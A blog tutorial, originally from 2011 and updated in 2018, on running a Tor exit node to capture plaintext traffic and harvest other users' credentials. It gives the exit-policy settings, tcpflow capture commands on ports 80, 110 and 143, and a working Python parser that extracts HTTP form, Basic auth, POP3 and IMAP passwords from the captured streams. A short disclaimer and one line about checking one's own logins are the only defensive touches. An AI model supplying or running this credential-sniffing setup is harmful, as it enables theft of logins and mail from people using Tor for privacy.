Wednesday, March 30, 2011

Intercepting TOR traffic to Sniff Passwords or other Data

For this tutorial, I recommend you have some decent TCP/IP knowledge.
UPDATED on 12th May 2018

For those of you who do not know what TOR is: it is an anonymity network that routes your connections through a chain of volunteer-run relays. TOR stands for 'The Onion Router'. It uses second-generation onion routing to hide where your connection comes from. TOR was originally sponsored by the US Naval Research Laboratory, was later funded by the EFF, and is now maintained by the non-profit Tor Project. TOR is completely free.

Onion routing works by relaying your connection through a series of systems (relays, or nodes) in various places, generally run by volunteers. Your client wraps each cell in one layer of encryption per relay; every relay strips its own layer, learns only the next hop, and passes the rest along. The last relay, the exit node, strips the final layer and makes the actual connection to the destination (ie the website you're connecting to on port 80).

That last hop, from the exit node to the destination, carries exactly what the application sent, and if the application protocol is unencrypted that is plaintext. This is what we will be taking advantage of.

Packet Sniffing:
The purpose of this post is to teach you how to sniff packets as they leave a TOR exit node. TOR, like every other way of hiding your identity, has its weak points. First of all, anyone can run a relay, so there's a chance your traffic is passing through a government-run node somewhere in the circuit (unlikely, but still possible).

Now, traffic is encrypted between your TOR client and every relay in the circuit, but the exit node removes the last layer and forwards exactly what your application sent. Unless the application itself uses encryption (HTTPS, POP3S, IMAPS or STARTTLS), that is plaintext. This means that if you set up your own machine as a TOR EXIT node, you can sniff the traffic as it leaves your network: a MITM (Man In The Middle) position, though a passive one. Keep in mind what it does and does not give you: you see the content of the connection, but not who sent it, because the only source address on the wire is your own relay's.
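To make the layering concrete, here is a small simulation I've added to this post (it is not code from the original article and not Tor's own implementation): three relays with constructed keys, a toy HMAC-based stream cipher standing in for Tor's real AES-CTR relay crypto, a made-up HTTP login and a stand-in TLS record as the two payloads. Relay names, keys, hostnames and credentials are all invented for the example.

```python
import hashlib
import hmac
import os

# Toy per-hop stream cipher used only for this simulation: keystream =
# HMAC-SHA256(key, nonce || counter) XORed into the data. Tor's real relay
# crypto is AES-CTR under keys negotiated when the circuit is extended.
def _keystream(key, nonce, length):
    out = b""
    block = 0
    while len(out) < length:
        out += hmac.new(key, nonce + block.to_bytes(4, "big"), hashlib.sha256).digest()
        block += 1
    return out[:length]


def layer_encrypt(key, data):
    nonce = os.urandom(8)
    return nonce + bytes(a ^ b for a, b in zip(data, _keystream(key, nonce, len(data))))


def layer_decrypt(key, blob):
    nonce, body = blob[:8], blob[8:]
    return bytes(a ^ b for a, b in zip(body, _keystream(key, nonce, len(body))))


def build_onion(path, destination, payload):
    """Client side. path = [(relay_name, key), ...], guard first, exit last.
    Wrap the payload in one layer per relay (innermost for the exit) and
    prefix each layer with the address the previous hop must forward it to."""
    cell = b"to:" + destination.encode() + b"\n" + payload
    for i in range(len(path) - 1, -1, -1):
        name, key = path[i]
        cell = layer_encrypt(key, cell)
        if i > 0:
            cell = b"to:" + name.encode() + b"\n" + cell
    return cell


def relay_process(key, cell):
    """Relay side. Peel exactly one layer: the relay learns the next hop and
    gets an opaque blob to forward. It cannot see any inner layer."""
    inner = layer_decrypt(key, cell)
    route, forwarded = inner.split(b"\n", 1)
    return route[3:].decode(), forwarded


def run_circuit(path, destination, payload):
    """Drive one cell through every relay and record what each one sees:
    {relay_name: (next_hop, bytes_it_forwards)}."""
    cell = build_onion(path, destination, payload)
    view = {}
    for name, key in path:
        next_hop, cell = relay_process(key, cell)
        view[name] = (next_hop, cell)
    return view


# Constructed demo circuit and traffic: made-up relay names, keys derived from
# those names, a fake login and a stand-in for a TLS record. None of it is real.
CIRCUIT = [(n, hashlib.sha256(n.encode()).digest()) for n in ("guard", "middle", "exit")]
HTTP_LOGIN = b"POST /login HTTP/1.1\r\nHost: forum.example\r\n\r\nuser=alice&password=hunter2"
TLS_RECORD = b"\x16\x03\x01\x00\x05\x01\x00\x00\x01\x00"  # not a real ClientHello


def exit_sees(view, marker):
    """True if the exit relay forwards `marker` in the clear."""
    return marker in view["exit"][1]


if __name__ == "__main__":
    for label, dest, payload in (("plain HTTP", "forum.example:80", HTTP_LOGIN),
                                 ("TLS", "forum.example:443", TLS_RECORD)):
        print(label)
        for name, (hop, blob) in run_circuit(CIRCUIT, dest, payload).items():
            print(f"  {name:6} -> {hop:18} password visible: {b'password' in blob}")
```

Running it shows the guard and middle relays forwarding only ciphertext and the name of the next hop, while the exit forwards the HTTP login with the password readable. With the TLS payload the exit forwards the same bytes the client sent, which is ciphertext the exit has no key for, so there is nothing to sniff even at that last hop.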

To do this, your machine first needs to be running as a TOR exit node. So, let's get started. This post was written around Vidalia, the graphical controller that TOR shipped with at the time, so first off you need to install Vidalia.

All Vidalia is, is a GUI for TOR, giving you easier control over things. Start by installing TOR and Vidalia, and set up your TOR connection. Download them here. Make sure you select the Vidalia bundle for your OS. Note that Vidalia is no longer maintained; on a current TOR install every setting below has an equivalent line in the torrc configuration file.

Once you have Vidalia installed, you need to configure it to become an exit node. Go to 'Setup Relaying' on the Vidalia GUI, find the exit policies tab, and tick the boxes for the services you want to allow out. (Without Vidalia, the same thing is done with the ExitRelay and ExitPolicy directives in torrc.)

My advice would be to allow only 'Websites' (plain HTTP, port 80) and 'Retrieve Mail' (POP3 on 110, IMAP on 143). Most of the other default exit ports are either of no use to you or TLS-encrypted, and mail clients that use POP3S/IMAPS (995/993) will give you nothing readable either.

Getting the data:
Now, let's get to work. If you're running a Linux distro, I'd suggest using tcpflow for this (download it here). tcpflow reassembles each TCP connection it sees into a separate file in the current directory, one file per direction, which is much easier to read than raw packets.

Once you have tcpflow installed, create a new directory, open up a console session, cd into the new directory you made, switch over to the root account (capturing needs it), then run the following commands in that directory (tcpflow is console-based). Each one keeps running until you stop it, so start each in its own terminal:
tcpflow -i eth0 port 80

tcpflow -i eth0 port 110

tcpflow -i eth0 port 143
or capture all three in a single process with a combined filter:
tcpflow -i eth0 'port 80 or port 110 or port 143'
Replace eth0 with whatever interface your relay's traffic actually leaves on. This will capture HTTP requests and responses, POP3 sessions and IMAP sessions. Be aware that it captures everything on that interface, including your own browsing, not just the relay's exit traffic. Open a new console window and use the following command to stop sniffing:
killall tcpflow
or of course, just use CTRL + C to kill the process currently running in the terminal. If you want to have a play around with tcpflow, then there's a guide on how to use it here.

What you're doing with these commands is sniffing the traffic that leaves your exit node, which lets you read and intercept the traffic of people using TOR before it reaches its final destination. In the reassembled flows you'll find things like login forms submitted over plain HTTP, HTTP Basic 'Authorization' headers, POP3 USER/PASS lines and IMAP LOGIN commands, plus the contents of any mail fetched without TLS. What you won't find is who sent it: the connection originates from your relay, so the source address on every flow is your own.
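Here is a small parser I've added to this post (not code from the original article) that pulls credentials out of reassembled client-to-server streams of the kind tcpflow writes: HTTP form posts and query strings, HTTP Basic auth, POP3 USER/PASS and IMAP LOGIN. It also recognises a TLS stream by its record header and gives up on it, which is the 'unless encryption is forced' case above. The sample streams, hostnames and credentials are constructed; the tcpflow file-naming assumption is noted in the code.

```python
import base64
import os
import re
from urllib.parse import parse_qs

USER_KEYS = {"user", "username", "login", "email", "uid"}
PASS_KEYS = {"pass", "password", "passwd", "pwd"}

# One HTTP request head: request line, zero or more header lines, blank line.
HTTP_REQ = re.compile(
    r"(?P<method>GET|POST) (?P<target>\S+) HTTP/1\.[01]\r\n"
    r"(?P<headers>(?:[^\r\n]+\r\n)*)\r\n")
POP3_USER = re.compile(r"^USER (\S+)$", re.I)
POP3_PASS = re.compile(r"^PASS (.+)$", re.I)
IMAP_LOGIN = re.compile(r"^\S+ LOGIN (\S+) (\S+)$", re.I)


def is_tls(stream):
    """TLS record header: content type 0x16 (handshake), major version 0x03."""
    return len(stream) >= 2 and stream[0] == 0x16 and stream[1] == 0x03


def _form_creds(fields, source):
    user = next((v[0] for k, v in fields.items() if k.lower() in USER_KEYS), "?")
    secret = next((v[0] for k, v in fields.items() if k.lower() in PASS_KEYS), None)
    return [(source, user, secret)] if secret is not None else []


def extract_credentials(stream):
    """Return [(protocol, username, secret), ...] found in one client->server stream."""
    if is_tls(stream):
        return []  # an exit only relays ciphertext here; there is nothing to read
    text = stream.decode("latin-1")
    found = []

    for m in HTTP_REQ.finditer(text):
        headers = {}
        for line in m.group("headers").split("\r\n"):
            name, sep, value = line.partition(":")
            if sep:
                headers[name.strip().lower()] = value.strip()
        auth = headers.get("authorization", "")
        if auth.lower().startswith("basic "):
            try:
                user, _, secret = base64.b64decode(auth[6:]).decode("latin-1").partition(":")
                found.append(("http-basic", user, secret))
            except ValueError:
                pass  # malformed base64: skip rather than crash on hostile input
        _, sep, query = m.group("target").partition("?")
        if sep:
            found += _form_creds(parse_qs(query), "http-query")
        try:
            length = int(headers.get("content-length", "0"))
        except ValueError:
            length = 0
        body = text[m.end():m.end() + length]
        if body and "form-urlencoded" in headers.get("content-type", ""):
            found += _form_creds(parse_qs(body), "http-form")

    pop_user = "?"
    for line in text.split("\r\n"):
        u, p, l = POP3_USER.match(line), POP3_PASS.match(line), IMAP_LOGIN.match(line)
        if u:
            pop_user = u.group(1)
        elif p:
            found.append(("pop3", pop_user, p.group(1)))
        elif l:
            found.append(("imap", l.group(1), l.group(2)))
    return found


def scan_tcpflow_dir(directory, server_ports=(80, 110, 143)):
    """Run the parser over a tcpflow output directory. This assumes tcpflow's default
    file naming (src-ip.port-dst-ip.port, no -T), where the last five digits are the
    server port, so only the client->server file of each flow is read."""
    results = {}
    for name in sorted(os.listdir(directory)):
        if not re.fullmatch(r"[\d.]+-[\d.]+", name):
            continue
        if int(name.rsplit(".", 1)[1]) not in server_ports:
            continue
        with open(os.path.join(directory, name), "rb") as fh:
            creds = extract_credentials(fh.read())
        if creds:
            results[name] = creds
    return results


# Constructed sample streams: made-up hosts and credentials, not captured data.
SAMPLES = {
    "http-form": (b"POST /login HTTP/1.1\r\nHost: forum.example\r\n"
                  b"Content-Type: application/x-www-form-urlencoded\r\n"
                  b"Content-Length: 31\r\n\r\nusername=alice&password=hunter2"),
    "http-basic": (b"GET /private HTTP/1.1\r\nHost: intranet.example\r\n"
                   b"Authorization: Basic " + base64.b64encode(b"bob:letmein") + b"\r\n\r\n"),
    "pop3": b"USER carol\r\nPASS s3cret\r\nSTAT\r\nQUIT\r\n",
    "imap": b"a001 LOGIN dave pa55word\r\na002 SELECT INBOX\r\n",
    "tls": b"\x16\x03\x01\x00\x05\x01\x00\x00\x01\x00",  # stand-in for a ClientHello
}

if __name__ == "__main__":
    for label, stream in SAMPLES.items():
        print(label, extract_credentials(stream))
```

Point scan_tcpflow_dir at the directory you ran tcpflow in and it returns the credentials per flow file. The same parser run over a capture of your own outbound traffic is the quickest way to find out which of your own logins an exit node could read, which is the defensive use of the technique.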

If you're using Windows or another operating system, then try downloading Wireshark here. Unlike tcpflow, Wireshark is not console-based; the whole thing has a GUI and it's fairly straightforward to use. Apply the same capture filter (port 80 or port 110 or port 143), then right-click a packet and use 'Follow TCP Stream' to get the same reassembled view tcpflow writes to files.

I suggest changing your exit policies so you're running as an exit node ONLY when you want to sniff unencrypted traffic and gather data. Your ISP may not be too happy if people are viewing illegal content through your connection, and exits caught tampering with or snooping on traffic get the BadExit flag from the TOR directory authorities, after which clients stop using them as exits.

Use this knowledge wisely, and know that I don't advocate, nor should I be held responsible for misuse of this knowledge.


  1. is it possible to make the traffic fully encrypted?

  2. I don't have Linux, how do I make it work on Windows?

    1. Read carefully, it also works on Windows.

  3. If you put this into another Tor network, then you can leave yourself set up as an exit node all the time. For example: your home ISP + your cellular data Wifi hotspot.

    This really makes Tor not worth using and defeats the entire purpose. I bet there are more people doing this on Tor, than agencies spying on unencrypted ISP traffic. Just a matter of time before Tor loses its appeal.

  4. I read that Tor passes through multiple layers and that each layer only possesses the ability to remove one level of encryption, so essentially as data passes from point A to B it is encrypted twice. A decrypts only the destination B, B is only able to decrypt the part telling it to go to C, and C has only the ability to route it to the final destination. So is packet sniffing then decrypting the information available on exit, such as credentials (logins, passwords etc.)? What would be necessary to decrypt both the origin and destination? Like, how could B know that it originated at A and that it was headed to C?